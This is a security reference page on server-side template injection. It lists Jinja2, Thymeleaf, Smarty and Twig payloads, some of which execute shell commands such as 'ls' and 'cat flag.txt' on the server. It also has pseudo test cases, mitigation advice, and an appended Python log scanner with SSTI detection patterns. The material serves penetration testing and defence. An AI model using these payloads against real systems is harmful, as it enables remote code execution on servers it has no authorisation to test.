SSTI

http://IP:PORT/{{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat flag.txt').read() }}

Description

Server-Side Template Injection (SSTI) occurs when user input is embedded directly into a server-side template, allowing attackers to inject and execute arbitrary code on the server.

Example with Scenario

Scenario: A web application uses a template engine to render web pages, and it incorporates user input directly into the template without proper sanitization. An attacker can craft malicious input to manipulate the template engine and execute arbitrary code.

Payloads and Test Cases

Payloads

  1. Jinja2 (Python):

    {{ 7*7 }}
    {{ config.items() }}
  2. Thymeleaf (Java):

    ${T(java.lang.Runtime).getRuntime().exec("ls")}
  3. Smarty (PHP):

    {$smarty.version}
    {php}echo `ls`;{/php}
  4. Twig (PHP):

    {{ 7*7 }}
    {{ system('ls') }}

Test Cases

  1. Jinja2 (Python):

    • Payload:

      {{ 7*7 }}
      {{ ''.__class__.__mro__[1].__subclasses__()[59].__init__.__globals__['os'].popen('ls').read() }}
    • Test Case:

      # Send payload to the server
      sendPayloadToServer("{{ 7*7 }}")
      # Verify if the template rendered the expression correctly
      checkResponseForValue("49")
      
      sendPayloadToServer("{{ ''.__class__.__mro__[1].__subclasses__()[59].__init__.__globals__['os'].popen('ls').read() }}")
      # Verify if the command executed correctly
      checkResponseForCommandExecution("ls")
  2. Thymeleaf (Java):

    • Payload:

      ${7*7}
      ${T(java.lang.Runtime).getRuntime().exec("ls")}
    • Test Case:

      // Send payload to the server
      sendPayloadToServer("${7*7}")
      // Verify if the template rendered the expression correctly
      checkResponseForValue("49")
      
      sendPayloadToServer("${T(java.lang.Runtime).getRuntime().exec('ls')}")
      // Verify if the command executed correctly
      checkResponseForCommandExecution("ls")
  3. Smarty (PHP):

    • Payload:

      {$smarty.version}
      {php}echo `ls`;{/php}
    • Test Case:

      // Send payload to the server
      sendPayloadToServer("{$smarty.version}")
      // Verify if the template rendered the expression correctly
      checkResponseForSmartyVersion()
      
      sendPayloadToServer("{php}echo `ls`;{/php}")
      // Verify if the command executed correctly
      checkResponseForCommandExecution("ls")
  4. Twig (PHP):

    • Payload:

      {{ 7*7 }}
      {{ system('ls') }}
    • Test Case:

      // Send payload to the server
      sendPayloadToServer("{{ 7*7 }}")
      // Verify if the template rendered the expression correctly
      checkResponseForValue("49")
      
      sendPayloadToServer("{{ system('ls') }}")
      // Verify if the command executed correctly
      checkResponseForCommandExecution("ls")

Mitigation

  1. Input Sanitization:

    • Sanitize user input to ensure it does not contain malicious code.

    • Use escaping functions to properly escape user input before embedding it in templates.

  2. Use Safe Template Engines:

    • Use template engines that do not allow arbitrary code execution or have strict separation between logic and presentation.

    • Configure template engines to disable or restrict dynamic code execution features.

  3. Content Security Policy (CSP):

    • Implement a strict Content Security Policy to limit the sources from which content can be loaded.

    • Use CSP to prevent the execution of inline scripts and styles.

  4. Whitelist Allowable Expressions:

    • Define and enforce a whitelist of allowable template expressions.

    • Restrict the use of dynamic expressions and variables within templates.

  5. Security Testing:

    • Conduct regular security testing, including fuzzing and penetration testing, to identify and mitigate SSTI vulnerabilities.

    • Use automated security tools to detect and prevent SSTI vulnerabilities in your codebase.
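As an added example that is not part of the original page, the following Python scans web-server access logs for the SSTI probe syntax listed above (Jinja2/Twig `{{ }}`, Thymeleaf/Spring-EL `${ }` and `T(java.…)`, Smarty `{$smarty.…}` and `{php}`) so that test payloads show up in monitoring before they reach a vulnerable template. The signatures and the sample log lines are constructed for this example and the engine labels are assumptions, not an official ruleset.

```python
import re
from urllib.parse import unquote_plus

# SSTI probe signatures for the engines covered on this page (constructed for this
# example; tune them against your application's legitimate input before relying on them).
SSTI_SIGNATURES = {
    "jinja2/twig": [
        r"\{\{\s*\d+\s*[*+\-]\s*\d+\s*\}\}",                       # {{ 7*7 }} arithmetic probe
        r"\{\{[^}]*(config|self|request|__class__|__mro__|__subclasses__|__globals__)",
        r"\{\{[^}]*\b(system|popen|__import__)\s*\(",              # {{ system('ls') }}
    ],
    "thymeleaf/spring-el": [
        r"\$\{\s*\d+\s*[*+\-]\s*\d+\s*\}",                         # ${7*7}
        r"\$\{[^}]*\bT\(\s*java\.",                                # T(java.lang.Runtime)
    ],
    "smarty": [
        r"\{\$smarty\.",                                           # {$smarty.version}
        r"\{php\}",                                                # {php}...{/php}
    ],
}
COMPILED = {engine: [re.compile(p, re.IGNORECASE) for p in pats]
            for engine, pats in SSTI_SIGNATURES.items()}

def scan_value(value):
    """Return the sorted engine families whose signatures match one request value."""
    # Decode twice so double-encoded probes (%257B%257B...) are not missed.
    decoded = unquote_plus(unquote_plus(value))
    return sorted(engine for engine, pats in COMPILED.items()
                  if any(p.search(decoded) for p in pats))

def scan_access_log(lines):
    """Scan combined-format access log lines; return (request_target, engines) per hit."""
    findings = []
    for line in lines:
        m = re.search(r'"(?:GET|POST|PUT|PATCH)\s+(\S+)', line)
        if m:
            hits = scan_value(m.group(1))
            if hits:
                findings.append((m.group(1), hits))
    return findings

# Constructed sample log lines: one benign request and three SSTI probes from this page.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /greet?name=Alice HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:12:00:01 +0000] "GET /greet?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 510',
    '10.0.0.9 - - [01/Jan/2024:12:00:02 +0000] "GET /greet?name=%24%7BT(java.lang.Runtime).getRuntime().exec(%22ls%22)%7D HTTP/1.1" 500 0',
    '10.0.0.9 - - [01/Jan/2024:12:00:03 +0000] "GET /greet?name=%7B%24smarty.version%7D HTTP/1.1" 200 520',
]
```

Only the query string is inspected here; extend `scan_access_log` to request bodies and headers if your logging captures them, since templates are often fed from POST fields.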
